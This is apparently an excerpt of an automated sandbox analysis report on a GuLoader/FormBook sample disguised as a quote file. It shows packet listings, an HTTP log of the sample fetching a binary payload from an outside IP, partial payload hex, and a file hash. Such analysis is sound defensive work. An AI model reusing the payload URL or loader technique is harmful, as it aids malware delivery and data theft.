                                          Mar 4, 2025 16:54:16.086105108 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.086127996 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.086158037 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.086951017 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.086961985 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.086971045 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.086982965 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.086993933 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.087003946 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.087013960 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.087017059 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.087028980 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.087038994 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.087043047 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.087055922 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.087063074 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.087085009 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.087114096 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.087677956 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.087735891 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.090101957 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090112925 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090126038 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090142012 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090167046 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.090200901 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.090322971 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090333939 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090344906 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.090378046 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.090409994 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167164087 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167213917 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167272091 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167273045 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167273045 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167309046 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167346954 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167354107 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167367935 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167408943 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167418003 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167427063 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167443991 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167458057 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167462111 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167479992 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167494059 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167495012 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167510033 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167521954 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167534113 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167538881 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167546988 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167561054 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167566061 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167635918 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167635918 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167860031 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167872906 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167882919 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167896032 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167908907 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167922974 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.167949915 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.167959929 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168004990 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168005943 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168051958 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168068886 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168082952 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168093920 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168121099 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168154001 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168181896 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168193102 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168207884 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168226004 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168258905 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168271065 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168277025 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168283939 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168299913 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168391943 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168538094 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168550014 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168560028 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168600082 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168637037 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168648005 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168658972 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168670893 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168697119 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168705940 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168706894 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168720007 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.168740988 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168771982 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.168950081 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169011116 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169061899 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169073105 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169084072 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169095039 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169106007 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169116020 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169126034 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169137001 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.169162035 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169162989 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169162989 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.169202089 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172655106 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172673941 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172686100 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172713041 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172729015 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172744989 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172756910 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172806978 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172837973 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172848940 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172857046 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172867060 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172878027 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172883034 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172888041 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172902107 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172910929 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.172918081 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172938108 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.172952890 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249265909 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249300957 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249320030 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249355078 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249407053 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249428988 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249429941 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249449015 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249476910 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249495029 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249501944 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249537945 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249567986 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249619007 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249665976 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249674082 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249708891 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249727964 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249754906 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249761105 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249795914 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249815941 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249830961 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249842882 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249866962 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249878883 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249902964 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249917030 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249933958 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249949932 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.249969006 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.249974012 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250004053 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250015020 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250037909 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250046015 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250072956 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250081062 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250108957 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250123978 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250145912 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250155926 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250176907 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250190973 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250215054 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250264883 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250299931 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250310898 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250349045 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250353098 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250386953 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250397921 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250422001 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250433922 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250457048 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250467062 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250500917 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250509024 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250540018 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250551939 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250575066 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250586033 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250610113 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250626087 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250641108 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250654936 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250677109 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250686884 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250714064 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250720024 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250749111 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250761032 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250786066 CET8063713196.251.86.79192.168.2.4
                                          Mar 4, 2025 16:54:16.250798941 CET6371380192.168.2.4196.251.86.79
                                          Mar 4, 2025 16:54:16.250828981 CET6371380192.168.2.4196.251.86.79

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Mar 4, 2025 16:53:59.426124096 CET5360082162.159.36.2192.168.2.4
                                          Mar 4, 2025 16:53:59.918355942 CET53561521.1.1.1192.168.2.4

                                          HTTP Request Dependency Graph

                                          • 196.251.86.79

                                          HTTP Packets

                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          0192.168.2.463713196.251.86.79807448C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          TimestampBytes transferredDirectionData
                                          Mar 4, 2025 16:54:14.930927038 CET172OUTGET /vHTwkXp255.bin HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
                                          Host: 196.251.86.79
                                          Cache-Control: no-cache
                                          Mar 4, 2025 16:54:15.595716953 CET1236INHTTP/1.1 200 OK
                                          Content-Type: application/octet-stream
                                          Last-Modified: Mon, 03 Mar 2025 23:14:59 GMT
                                          Accept-Ranges: bytes
                                          ETag: "80bac315928cdb1:0"
                                          Server: Microsoft-IIS/8.5
                                          Date: Tue, 04 Mar 2025 15:54:15 GMT
                                          Content-Length: 288832
                                          Data Raw: 96 58 41 5d f5 5d cb 4c 24 20 a6 55 45 09 e6 00 e7 2f 7d 08 ea 20 cd 39 87 56 f8 ab 70 f6 95 2d 26 37 c8 3c 49 d4 b3 f7 fe 8a 01 87 5f 5a dc f5 88 7e 0b fb 61 c9 bb 22 46 3c 99 44 5d 8d 0d fe 17 06 b7 f1 d8 e8 09 5b f0 55 ed 61 f3 db 05 c0 7c 8f 5b 0d b5 2d 3a 50 93 12 3d 70 f1 fc 50 39 d3 5d 53 fb 74 28 f1 49 22 00 eb 7e 7f 1e 01 36 44 05 fc eb 2e e2 05 45 5e 29 ca eb c1 5d bd 8a b6 c1 4b 66 45 7f 89 d6 4a 2e 71 d9 f0 07 11 bd ba 8e e9 1e fe ac 0a f9 8a 22 06 02 ed 38 5c 76 c6 d7 12 76 b8 ad c9 e9 dd 48 95 9a 22 11 4d ad 47 04 d6 dd 2b 76 dd 50 83 92 bb 36 01 29 99 cd 10 91 a4 c1 3f 26 ee 10 50 7e 2e d3 e0 fa c2 61 2e 56 2a 5d 70 18 f5 98 50 ea 52 73 36 fd bd ef 5a e0 d3 29 62 90 b4 69 89 e7 7c 3c e2 ea f8 35 78 d4 37 ab 7d 82 fc 5d c3 04 61 82 66 60 32 21 f6 36 4a f0 1c dc 39 f9 d6 80 ee b5 e8 68 2d 6c 09 d0 cf c9 1b 8c 9a 56 2d ac 5c aa d7 b2 cd bd 9b c2 7e c1 2b 32 62 b4 2b 83 a7 a6 22 52 65 89 b0 25 50 6a ce cf a6 1e 49 d0 33 2a 94 54 53 f9 1d da a9 98 e3 fb 64 42 1a 01 de 3f 1d 86 10 61 e9 9a [TRUNCATED]
                                          Data Ascii: XA]]L$ UE/} 9Vp-&7<I_Z~a"F<D][Ua|[-:P=pP9]St(I"~6D.E^)]KfEJ.q"8\vvH"MG+vP6)?&P~.a.V*]pPRs6Z)bi|<5x7}]af`2!6J9h-lV-\~+2b+"Re%PjI3*TSdB?ahK=0J\-9z9H}}QS76 "V26Q;Icj5A"2"}DJy}7q,DpxVs=>FOx}h/TkRO@oX8|+59mtBt#fy3NS?0qY0G3<nr|}SLRZ~:4!^1(]SSm2~*8K3YJ->wnXr?NBPSuc^{,wvdqRKMj<$0n~`=I>i_\<ObA5(?g*|R}CXwKdG\VOn'i:L6nGvr&3NiSwuR[J<[.51UyENBkc'?)U1Gt_~x-O(~u)/IPj4i{V4J6fQ3.3w] Fs?e/
                                          Mar 4, 2025 16:54:15.595768929 CET224INData Raw: ab c3 95 16 b6 c7 c8 8d 94 37 f7 d6 71 16 1c 71 ac 76 69 33 aa 0b e2 b6 47 2e 6a b1 24 26 ee 34 b9 e5 29 82 5c d8 c0 cd c7 45 a0 76 43 13 32 fc ab 45 86 e0 6f 22 de 7d cd 70 f1 0a e1 c5 e5 03 56 ed 8f a4 a0 3e ab d7 e6 ba e3 cf 26 7b 02 64 fb 56
                                          Data Ascii: 7qqvi3G.j$&4)\EvC2Eo"}pV>&{dV8H\ Z\'[Ua$[-:P=pP9]St(I"~6D.E^)y]hEkp=&EnmO&aV2p!f^*k{Z6)i
                                          Mar 4, 2025 16:54:15.595805883 CET1236INData Raw: 90 ad 61 02 46 89 e3 6d 1e 49 20 dd 9a a5 92 34 f0 82 ae 4a 78 92 6b 4a 4c f8 80 0a 9d da 1c 40 46 78 da 5e f0 d3 9a db 8e 1f 54 df 8a 9f c6 78 d4 37 ab 7d 82 fc 5d 93 41 61 82 2a 61 33 21 b0 71 1e af 1c dc 39 f9 d6 80 ee b5 08 68 2f 6d 02 d1 c4
                                          Data Ascii: aFmI 4JxkJL@Fx^Tx7}]Aa*a3!q9h/mV-\~+"b+"R%5PjO3*TSdBq?ahKq= J\-9z9H}}QS76 "V26Q;Icj5A"2"}DJy}7q,
                                          Mar 4, 2025 16:54:15.595840931 CET1236INData Raw: 89 c5 22 9f 9d 32 94 ff ad fc 1b f3 22 b4 7d 44 4a 79 aa 7d 88 82 37 f6 f1 cd da ee 71 f2 ce 2c 44 70 78 ef 87 e7 1f 86 56 ee 73 3d b9 e4 1c 3e 46 8a 9a 12 4f f0 d4 13 78 89 f7 b9 17 11 7d a6 97 68 2f aa d9 54 6b 04 0f 52 ae 03 4f 40 c9 ca 1f cc
                                          Data Ascii: "2"}DJy}7q,DpxVs=>FOx}h/TkRO@oX8+5)mtBt#Fy3NS?0qY0G3<nr|}SLRZ~:4!^1(]SSm2~*8K3YJ->w
                                          Mar 4, 2025 16:54:15.595874071 CET1236INData Raw: 08 d2 c4 1d 7e 2a 95 38 d9 0c e3 e6 4b 8f 8d 8b df fc 0b 33 cb f0 ac 59 ad 80 4a ab 2d 7f 3e 77 d7 6e ec 58 72 f4 bd 3f c9 e5 4e e0 42 50 53 c9 0f fb da 75 8c ac 9b 1b 63 f7 fb 5e 7b e1 2c 8f db dd a7 c9 9a ec a5 77 76 64 14 c8 c2 8b 71 52 c1 b7
                                          Data Ascii: ~*8K3YJ->wnXr?NBPSuc^{,wvdqRKMj<$0n~`=I>i_\<ObA5(?g*|R}CXwKdG\VOn'i:L6nGvr&3Ni
                                          Mar 4, 2025 16:54:15.595911980 CET672INData Raw: 4c ef 94 b3 65 91 fd cd d5 01 f3 d0 ae 7b 75 ff b4 26 57 1a 07 8c e6 32 3c 58 b4 8f 23 77 a8 64 4c d8 2c c5 16 fc 28 42 29 cc 95 1e 19 b4 4e f7 2e fb b7 2c d6 94 08 e6 f6 cf b1 cd 27 cb 61 82 44 a6 6c 2c b6 2a 4c 26 f1 74 14 85 5c ac c7 4d e8 90
                                          Data Ascii: Le{u&W2<X#wdL,(B)N.,'aDl,*L&t\M!YTAo%^$(v_"K%PyWhFYpk;JwnvqmRb02L/4?8Tqv3oc.If);vL`BFW!%U+-[
                                          Mar 4, 2025 16:54:15.676501989 CET1236INData Raw: 5a 6a 54 e7 88 aa 03 4f cd 4c 7a e2 33 90 81 19 b3 cc a9 a4 c9 d0 59 b8 e1 a2 87 50 99 40 c4 15 8d 80 8d 60 3b 11 53 e8 32 6e 12 8b 09 36 ac 5d da 77 1a e5 21 cf 59 3a ee f9 66 fe 29 e0 58 fc 33 e0 1e 02 46 eb 9f d9 9b 12 17 60 3f f6 17 7c 87 11
                                          Data Ascii: ZjTOLz3YP@`;S2n6]w!Y:f)X3F`?|0JaEVA3<n1lcY}5 @q8Tp!t]xBIf+A*=v [dMh-Prunin>u|pnZ6ea /*R4_Bn)c
                                          Mar 4, 2025 16:54:15.676573038 CET1236INData Raw: 13 5a 9e 48 99 eb 37 0a c9 e2 5c 84 68 de 1e 04 a1 3b 6f ac 06 1e e1 83 1c 81 8f 0f 18 7f 7e d9 50 85 3d f0 f7 00 94 8c 3e 74 34 f0 d4 a3 13 a5 16 1d 63 14 90 4c b5 3a 3a a0 4b 16 80 3e bc ac 14 be 23 45 68 24 6c bb b5 a0 3f 92 f2 1a df 85 f8 bf
                                          Data Ascii: ZH7\h;o~P=>t4cL::K>#Eh$l?sgUtE))nj(kofCo{iq'SlX! ZoP1u?[1DyDBkL&'CMFH_xEhj
                                          Mar 4, 2025 16:54:15.676608086 CET1236INData Raw: 15 ce b3 94 98 00 41 18 1c 47 18 a1 e6 7e 29 55 89 94 54 11 8d 48 6f 7d a9 07 e0 d8 94 e7 53 a6 37 7d 63 00 1d c4 c6 a4 66 fd 05 fd cc 9a f2 6e af f9 9b b7 02 4a 89 55 79 fe f3 a3 69 f2 0b 5e d6 06 ec da 4a 13 a2 77 8f 35 66 51 bb 57 33 f6 2e d8
                                          Data Ascii: AG~)UTHo}S7}cfnJUyi^Jw5fQW3.p Fsr//~;q>RK&H_ldjSn|DvLEk"~u`>m{&{e))&;cDLa'[r%'pzm-Qt8=4i:
                                          Mar 4, 2025 16:54:15.676642895 CET1236INData Raw: 4e 7e 0e b5 2d ba 29 d6 5a be b8 0d bc 25 38 92 dc aa 8d 1c 28 f1 35 c4 b8 5c 64 43 59 f6 d9 85 ff fa 60 d4 23 ea 5a 5d d3 bf 06 c1 62 bb 6d db 29 1f a9 bf cd 0b e9 aa 78 6f 96 cf 53 a8 e6 2c c4 b4 7e fa 92 e6 de e3 c4 53 6d a7 a4 b8 1b 8e b6 02
                                          Data Ascii: N~-)Z%8(5\dCY`#Z]bm)xoS,~Sm&{Z?lO^`c9{lA9bW=2,m4GjCZIv^{;h{,"3(a^<~_j>"2zA/b!j9"Zt@Fq~+G+PQ(@%n,
                                          Mar 4, 2025 16:54:15.676681042 CET896INData Raw: ea cb 7d b7 e1 86 48 f9 7c 61 e5 d2 3b d0 0d a9 76 9e b0 1e 4f 6a 8b 2a 94 54 ea f0 1b da a9 15 aa fb 5f 88 15 3e 10 77 68 7c fb 67 64 01 68 dd 0d 4b 66 d4 40 1a c0 1f bd d8 8b a6 ee a6 d4 f8 3b b1 a1 b8 0b 4a c1 3d 47 f6 d3 23 c7 23 a5 da f5 0e
                                          Data Ascii: }H|a;vOj*T_>wh|gdhKf@;J=G##K,VN}%kB~N]R5AVC2~z}_.&rDA's8;~Rk}teP^}5tWgn!]K>E+c<YF{i


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:10:53:14
                                          Start date:04/03/2025
                                          Path:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
                                          Imagebase:0x400000
                                          File size:684'504 bytes
                                          MD5 hash:1A0611D6FAD6A80C0369A33C2E09F52A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2215456819.0000000005564000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:10:54:05
                                          Start date:04/03/2025
                                          Path:C:\Users\user\Desktop\Steel Sample- QUOTE.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Steel Sample- QUOTE.exe"
                                          Imagebase:0x400000
                                          File size:684'504 bytes
                                          MD5 hash:1A0611D6FAD6A80C0369A33C2E09F52A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3341106363.0000000036E80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
